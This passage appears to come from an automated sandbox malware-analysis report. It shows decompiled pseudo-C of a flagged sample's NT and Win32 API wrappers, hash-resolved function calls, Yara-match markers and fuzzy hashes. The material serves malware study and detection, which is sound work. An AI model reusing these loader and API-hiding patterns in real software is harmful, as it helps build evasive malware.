                                                                                                                                                        					if(_t18 == 0) {
                                                                                                                                                        						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
                                                                                                                                                        						return _v16;
                                                                                                                                                        					}
                                                                                                                                                        					return _t18;
                                                                                                                                                        				} else {
                                                                                                                                                        					return _t15;
                                                                                                                                                        				}
                                                                                                                                                        			}














                                                                                                                                                        APIs
                                                                                                                                                        • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00409B92
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000005.00000002.2117770021.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Load
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2234796835-0
                                                                                                                                                        • Opcode ID: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
                                                                                                                                                        • Instruction ID: f6872c6640a97d379917802917a35d8835196bd2b620e753e6f67e56f73dccdd
                                                                                                                                                        • Opcode Fuzzy Hash: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
                                                                                                                                                        • Instruction Fuzzy Hash: EC0100B5D0010DBBDB10DAA5EC42FDEB778AB54318F0041A9A908A7281F635EA54C795
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                        			E004181C0(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
                                                                                                                                                        				long _t21;
                                                                                                                                                        				void* _t31;
                                                                                                                                                        
                                                                                                                                                        				_t3 = _a4 + 0xc40; // 0xc40
                                                                                                                                                        				E00418DC0(_t31, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
                                                                                                                                                        				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
                                                                                                                                                        				return _t21;
                                                                                                                                                        			}






                                                                                                                                                        APIs
                                                                                                                                                        • NtCreateFile.NTDLL(00000060,00408AF3,?,00413B97,00408AF3,FFFFFFFF,?,?,FFFFFFFF,00408AF3,00413B97,?,00408AF3,00000060,00000000,00000000), ref: 0041820D
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000005.00000001.2085577437.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CreateFile
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 823142352-0
                                                                                                                                                        • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                                                                                                                        • Instruction ID: 76db84dd9462a71377061bd321799a59568980bd09e0245c51acac76316ecf65
                                                                                                                                                        • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                                                                                                                        • Instruction Fuzzy Hash: 52F0B6B2200208ABCB08CF89DC85DEB77ADAF8C754F158248FA0D97241C630E8518BA4
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        • NtClose.NTDLL(00413D30,?,?,00413D30,00408AF3,FFFFFFFF), ref: 00418315
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000005.00000001.2085577437.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Close
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3535843008-0
                                                                                                                                                        • Opcode ID: e715edb3c493f1f287f3c4b7b7f6bc6b94959a6bba4e710101c5dc1b181e948d
                                                                                                                                                        • Instruction ID: 65a9a333b6333b62fd8a2b61e5747526a40d7b39af690597ae0511c14cabd584
                                                                                                                                                        • Opcode Fuzzy Hash: e715edb3c493f1f287f3c4b7b7f6bc6b94959a6bba4e710101c5dc1b181e948d
                                                                                                                                                        • Instruction Fuzzy Hash: C4F08276200214ABDB14EFD8DC80EEB736DEF88720F14855DFA1C9B241CA31E9558BA1
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                        			E004183A0(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
                                                                                                                                                        				long _t14;
                                                                                                                                                        				void* _t21;
                                                                                                                                                        
                                                                                                                                                        				_t3 = _a4 + 0xc60; // 0xca0
                                                                                                                                                        				E00418DC0(_t21, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
                                                                                                                                                        				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
                                                                                                                                                        				return _t14;
                                                                                                                                                        			}






                                                                                                                                                        APIs
                                                                                                                                                        • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,00418F94,?,00000000,?,00003000,00000040,00000000,00000000,00408AF3), ref: 004183D9
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000005.00000001.2085577437.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: AllocateMemoryVirtual
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2167126740-0
                                                                                                                                                        • Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                                                                                                                        • Instruction ID: ed05b43336be2385218ce2c210938f1a749d46cd8ec257da0df7421e0e4bafff
                                                                                                                                                        • Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                                                                                                                        • Instruction Fuzzy Hash: BCF015B2200208ABCB14DF89DC81EEB77ADAF88754F118549FE0897241CA30F810CBA4
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        • NtClose.NTDLL(00413D30,?,?,00413D30,00408AF3,FFFFFFFF), ref: 00418315
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000005.00000001.2085577437.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Close
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3535843008-0
                                                                                                                                                        • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                                                                                                                        • Instruction ID: fa02b1b0b4c248d7afc65a810b6911db7169f724aa7cfa6c67706bd771296af7
                                                                                                                                                        • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                                                                                                                        • Instruction Fuzzy Hash: F5D01776200314ABD710EF99DC85EE77BACEF48760F154499BA189B282CA30FA0086E0
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000005.00000002.2117953088.00000000008D0000.00000040.00000001.sdmp, Offset: 008C0000, based on PE: true
                                                                                                                                                        • Associated: 00000005.00000002.2117948859.00000000008C0000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000005.00000002.2118033421.00000000009B0000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000005.00000002.2118037245.00000000009C0000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000005.00000002.2118042385.00000000009C4000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000005.00000002.2118047677.00000000009C7000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000005.00000002.2118051325.00000000009D0000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000005.00000002.2118076646.0000000000A30000.00000040.00000001.sdmp
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000005.00000002.2117953088.00000000008D0000.00000040.00000001.sdmp, Offset: 008C0000, based on PE: true
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000005.00000002.2117953088.00000000008D0000.00000040.00000001.sdmp, Offset: 008C0000, based on PE: true
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000005.00000002.2117953088.00000000008D0000.00000040.00000001.sdmp, Offset: 008C0000, based on PE: true
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000005.00000002.2117953088.00000000008D0000.00000040.00000001.sdmp, Offset: 008C0000, based on PE: true
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000005.00000002.2117953088.00000000008D0000.00000040.00000001.sdmp, Offset: 008C0000, based on PE: true
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000005.00000002.2117953088.00000000008D0000.00000040.00000001.sdmp, Offset: 008C0000, based on PE: true
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000005.00000002.2117953088.00000000008D0000.00000040.00000001.sdmp, Offset: 008C0000, based on PE: true
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                                        • Opcode ID: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
                                                                                                                                                        • Instruction ID: bb22edd625d441e86b4201bf2007cb1784deb073e32f09f3a807e6c8f80ed535
                                                                                                                                                        • Opcode Fuzzy Hash: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
                                                                                                                                                        • Instruction Fuzzy Hash: ACB01272104544C7F3099714ED06B8B7210FB80F00F00893AA007828A1DB39992CE456
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000005.00000002.2117953088.00000000008D0000.00000040.00000001.sdmp, Offset: 008C0000, based on PE: true
                                                                                                                                                        • Associated: 00000005.00000002.2117948859.00000000008C0000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000005.00000002.2118033421.00000000009B0000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000005.00000002.2118037245.00000000009C0000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000005.00000002.2118042385.00000000009C4000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000005.00000002.2118047677.00000000009C7000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000005.00000002.2118051325.00000000009D0000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000005.00000002.2118076646.0000000000A30000.00000040.00000001.sdmp
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                                        • Opcode ID: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
                                                                                                                                                        • Instruction ID: 9b30904a3bfeb6814e26683714e5c097bc05a41d35c26203adaeaac906fc0f52
                                                                                                                                                        • Opcode Fuzzy Hash: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
                                                                                                                                                        • Instruction Fuzzy Hash: C9B01272100580C7E34EA714D906B4B7210FB80F00F408A3AA00781891DB789B2CD98A
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000005.00000002.2117953088.00000000008D0000.00000040.00000001.sdmp, Offset: 008C0000, based on PE: true
                                                                                                                                                        • Associated: 00000005.00000002.2117948859.00000000008C0000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000005.00000002.2118033421.00000000009B0000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000005.00000002.2118037245.00000000009C0000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000005.00000002.2118042385.00000000009C4000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000005.00000002.2118047677.00000000009C7000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000005.00000002.2118051325.00000000009D0000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000005.00000002.2118076646.0000000000A30000.00000040.00000001.sdmp
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                                        • Opcode ID: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
                                                                                                                                                        • Instruction ID: 7e2af0442ae64c9f6bb8df8c94f4cb17495a0f0e8e42cafe04a2b86fa0e4786e
                                                                                                                                                        • Opcode Fuzzy Hash: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
                                                                                                                                                        • Instruction Fuzzy Hash: A2B012B2104580C7E3099714D906F4B7210FB90F00F40893EA00F81851DB3CD92CD44A
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        C-Code - Quality: 82%
                                                                                                                                                        			E00407260(void* __eflags, intOrPtr _a4, long _a8) {
                                                                                                                                                        				char _v67;
                                                                                                                                                        				char _v68;
                                                                                                                                                        				void* _t12;
                                                                                                                                                        				intOrPtr* _t13;
                                                                                                                                                        				int _t14;
                                                                                                                                                        				long _t21;
                                                                                                                                                        				intOrPtr* _t25;
                                                                                                                                                        				void* _t26;
                                                                                                                                                        
                                                                                                                                                        				_v68 = 0;
                                                                                                                                                        				E00419D20( &_v67, 0, 0x3f);
                                                                                                                                                        				E0041A900( &_v68, 3);
                                                                                                                                                        				_t24 = _a4 + 0x1c;
                                                                                                                                                        				_t12 = E00409B20(_a4 + 0x1c, _a4 + 0x1c,  &_v68); // executed
                                                                                                                                                        				_t13 = E00413E30(_t24, _t12, 0, 0, 0xc4e7b6d6);
                                                                                                                                                        				_t25 = _t13;
                                                                                                                                                        				if(_t25 != 0) {
                                                                                                                                                        					_t21 = _a8;
                                                                                                                                                        					_t14 = PostThreadMessageW(_t21, 0x111, 0, 0); // executed
                                                                                                                                                        					_t33 = _t14;
                                                                                                                                                        					if(_t14 == 0) {
                                                                                                                                                        						_t14 =  *_t25(_t21, 0x8003, _t26 + (E00409280(_t33, 1, 8) & 0x000000ff) - 0x40, _t14);
                                                                                                                                                        					}
                                                                                                                                                        					return _t14;
                                                                                                                                                        				}
                                                                                                                                                        				return _t13;
                                                                                                                                                        			}












                                                                                                                                                        APIs
                                                                                                                                                        • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 004072BA
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000005.00000001.2085577437.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: MessagePostThread
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1836367815-0
                                                                                                                                                        • Opcode ID: b429a28fbdaf8ade12dc58879e230a39c476b9a6de75f7f862eb8cc2ee54f132
                                                                                                                                                        • Instruction ID: bbcd0b2e5740072d15388175686a93538b06234ac68ffc2b081785cbfc84dfa6
                                                                                                                                                        • Opcode Fuzzy Hash: b429a28fbdaf8ade12dc58879e230a39c476b9a6de75f7f862eb8cc2ee54f132
                                                                                                                                                        • Instruction Fuzzy Hash: 2B01D431A8022876E720A6959C03FFF772C9B00B54F05405EFF04BA1C2E6A87D0682EA
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        C-Code - Quality: 57%
                                                                                                                                                        			E00407235(void* __ebx, void* __edx, void* __eflags) {
                                                                                                                                                        				void* _t6;
                                                                                                                                                        				int _t7;
                                                                                                                                                        				intOrPtr _t10;
                                                                                                                                                        				void* _t11;
                                                                                                                                                        				void* _t16;
                                                                                                                                                        				long _t20;
                                                                                                                                                        				void* _t22;
                                                                                                                                                        				int _t23;
                                                                                                                                                        				void* _t27;
                                                                                                                                                        
                                                                                                                                                        				asm("adc dl, bh");
                                                                                                                                                        				if(__eflags <= 0) {
                                                                                                                                                        					_t7 = E00413E30(_t22, _t6, 0, 0, 0xc4e7b6d6);
                                                                                                                                                        					_t23 = _t7;
                                                                                                                                                        					__eflags = _t23;
                                                                                                                                                        					if(_t23 != 0) {
                                                                                                                                                        						_t20 =  *(_t27 + 0xc);
                                                                                                                                                        						_t7 = PostThreadMessageW(_t20, 0x111, 0, 0); // executed
                                                                                                                                                        						__eflags = _t7;
                                                                                                                                                        						if(__eflags == 0) {
                                                                                                                                                        							_t7 =  *_t23(_t20, 0x8003, _t27 + (E00409280(__eflags, 1, 8) & 0x000000ff) - 0x40, _t7);
                                                                                                                                                        						}
                                                                                                                                                        					}
                                                                                                                                                        					return _t7;
                                                                                                                                                        				} else {
                                                                                                                                                        					asm("aas");
                                                                                                                                                        					_t10 =  *0x568e29e7;
                                                                                                                                                        					_push(_t22);
                                                                                                                                                        					_t11 = E00419700(_t10, _t16, 0x11c6f95e);
                                                                                                                                                        					return E004195B0(_t16) + _t11 + 0x1000; // executed
                                                                                                                                                        				}
                                                                                                                                                        			}













                                                                                                                                                        APIs
                                                                                                                                                        • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 004072BA
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000005.00000001.2085577437.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: MessagePostThread
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1836367815-0
                                                                                                                                                        • Opcode ID: 8be962c066e9e1b784657a13098f17ebb0740602b1f9d1d027ef666484d65ed3
                                                                                                                                                        • Instruction ID: 471561d3f7ca916a2f66550eb52f1a368f70a27f6b475d732e7386b654590829
                                                                                                                                                        • Opcode Fuzzy Hash: 8be962c066e9e1b784657a13098f17ebb0740602b1f9d1d027ef666484d65ed3
                                                                                                                                                        • Instruction Fuzzy Hash: 6EF04C32E8021035E62165A52C43FFA334D4B40B15F05006FFF04FA2C2E6996D0582EA
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        C-Code - Quality: 75%
                                                                                                                                                        			E004184C9(void* __eax, intOrPtr _a8, void* _a12, long _a16, void* _a20) {
                                                                                                                                                        				void* _t9;
                                                                                                                                                        				char _t13;
                                                                                                                                                        				void* _t14;
                                                                                                                                                        				void* _t20;
                                                                                                                                                        				void* _t29;
                                                                                                                                                        
                                                                                                                                                        				_pop(_t14);
                                                                                                                                                        				_t9 = __eax + 1;
                                                                                                                                                        				asm("aaa");
                                                                                                                                                        				_t15 =  !=  ?  *((void*)(_t9 - 0x1374aad2)) : _t14;
                                                                                                                                                        				_t29 =  !=  ?  *((void*)(_t9 - 0x1374aad2)) : _t14;
                                                                                                                                                        				_t10 = _a8;
                                                                                                                                                        				_t4 = _t10 + 0xc74; // 0xc74
                                                                                                                                                        				E00418DC0(_t20, _a8, _t4,  *((intOrPtr*)(_a8 + 0x10)), 0, 0x35);
                                                                                                                                                        				_t13 = RtlFreeHeap(_a12, _a16, _a20); // executed
                                                                                                                                                        				return _t13;
                                                                                                                                                        			}









                                                                                                                                                        APIs
                                                                                                                                                        • RtlFreeHeap.NTDLL(00000060,00408AF3,?,?,00408AF3,00000060,00000000,00000000,?,?,00408AF3,?,00000000), ref: 004184FD
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000005.00000001.2085577437.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: FreeHeap
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3298025750-0
                                                                                                                                                        • Opcode ID: 3728b28ccc6d3ee5f517729836873ef245aec0e7b459a85bf7de1199065036ae
                                                                                                                                                        • Instruction ID: 5cccc2591089b8043b59645ecdbf8b8adda3bc674d5e08dd215ac923b18c5cf1
                                                                                                                                                        • Opcode Fuzzy Hash: 3728b28ccc6d3ee5f517729836873ef245aec0e7b459a85bf7de1199065036ae
                                                                                                                                                        • Instruction Fuzzy Hash: 2CE09AB5200200AFD714EF94CC88EE733A8EF88354F008589FD585B281CA30EC10CBB0
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                        			E004184D0(intOrPtr _a4, void* _a8, long _a12, void* _a16) {
                                                                                                                                                        				char _t10;
                                                                                                                                                        				void* _t15;
                                                                                                                                                        
                                                                                                                                                        				_t3 = _a4 + 0xc74; // 0xc74
                                                                                                                                                        				E00418DC0(_t15, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
                                                                                                                                                        				_t10 = RtlFreeHeap(_a8, _a12, _a16); // executed
                                                                                                                                                        				return _t10;
                                                                                                                                                        			}






                                                                                                                                                        APIs
                                                                                                                                                        • RtlFreeHeap.NTDLL(00000060,00408AF3,?,?,00408AF3,00000060,00000000,00000000,?,?,00408AF3,?,00000000), ref: 004184FD
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000005.00000001.2085577437.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: FreeHeap
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3298025750-0
                                                                                                                                                        • Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                                                                                                                        • Instruction ID: 0c1265b7fbf046cbfd36917309396888787f1b5b9f48543de1c0af89871077f5
                                                                                                                                                        • Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                                                                                                                        • Instruction Fuzzy Hash: 2EE01AB12002046BD714DF59DC45EA777ACAF88750F014559F90857241CA30E9108AB0
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                        			E00418490(intOrPtr _a4, void* _a8, long _a12, long _a16) {
                                                                                                                                                        				void* _t10;
                                                                                                                                                        				void* _t15;
                                                                                                                                                        
                                                                                                                                                        				E00418DC0(_t15, _a4, _a4 + 0xc70,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x34);
                                                                                                                                                        				_t10 = RtlAllocateHeap(_a8, _a12, _a16); // executed
                                                                                                                                                        				return _t10;
                                                                                                                                                        			}






                                                                                                                                                        APIs
                                                                                                                                                        • RtlAllocateHeap.NTDLL(00413516,?,00413C8F,00413C8F,?,00413516,?,?,?,?,?,00000000,00408AF3,?), ref: 004184BD
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000005.00000001.2085577437.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: AllocateHeap
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1279760036-0
                                                                                                                                                        • Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                                                                                                                        • Instruction ID: d4cd8ba0fc8cb19801f053331f4cf649e26225416c3eadc5d6da7764d9533391
                                                                                                                                                        • Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                                                                                                                        • Instruction Fuzzy Hash: 81E012B1200208ABDB14EF99DC41EA777ACAF88654F118559FA085B282CA30F9108AB0
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                        			E00418630(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
                                                                                                                                                        				int _t10;
                                                                                                                                                        				void* _t15;
                                                                                                                                                        
                                                                                                                                                        				E00418DC0(_t15, _a4, _a4 + 0xc8c,  *((intOrPtr*)(_a4 + 0xa18)), 0, 0x46);
                                                                                                                                                        				_t10 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
                                                                                                                                                        				return _t10;
                                                                                                                                                        			}






                                                                                                                                                        APIs
                                                                                                                                                        • LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CFA2,0040CFA2,00000041,00000000,?,00408B65), ref: 00418660
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000005.00000001.2085577437.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: LookupPrivilegeValue
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3899507212-0
                                                                                                                                                        • Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                                                                                                                        • Instruction ID: a95af6b202be8dae21372797db95a078404a8f30fafd20f5c772dce95c9aa66f
                                                                                                                                                        • Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                                                                                                                        • Instruction Fuzzy Hash: 31E01AB12002086BDB10DF49DC85EE737ADAF89650F018559FA0857241CA34E8108BF5
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                        			E00418510(intOrPtr _a4, int _a8) {
                                                                                                                                                        				void* _t10;
                                                                                                                                                        
                                                                                                                                                        				_t5 = _a4;
                                                                                                                                                        				E00418DC0(_t10, _a4, _a4 + 0xc7c,  *((intOrPtr*)(_t5 + 0xa14)), 0, 0x36);
                                                                                                                                                        				ExitProcess(_a8);
                                                                                                                                                        			}





                                                                                                                                                        APIs
                                                                                                                                                        • ExitProcess.KERNELBASE(?,?,00000000,?,?,?), ref: 00418538
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000005.00000001.2085577437.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ExitProcess
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 621844428-0
                                                                                                                                                        • Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                                                                                                                        • Instruction ID: 7205fd5e3e27dabd4e13006f85928de99448ffddaf0958f387cae24292a3a6f6
                                                                                                                                                        • Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                                                                                                                        • Instruction Fuzzy Hash: ACD012716003147BD620DF99DC85FD7779CDF49750F018469BA1C5B241C931BA0086E1
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Non-executed Functions

                                                                                                                                                        C-Code - Quality: 94%
                                                                                                                                                        			E00908788(signed int __ecx, void* __edx, signed int _a4) {
                                                                                                                                                        				signed int _v8;
				short* _v12;
				void* _v16;
				signed int _v20;
				char _v24;
				signed int _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				char _v44;
				signed int _v48;
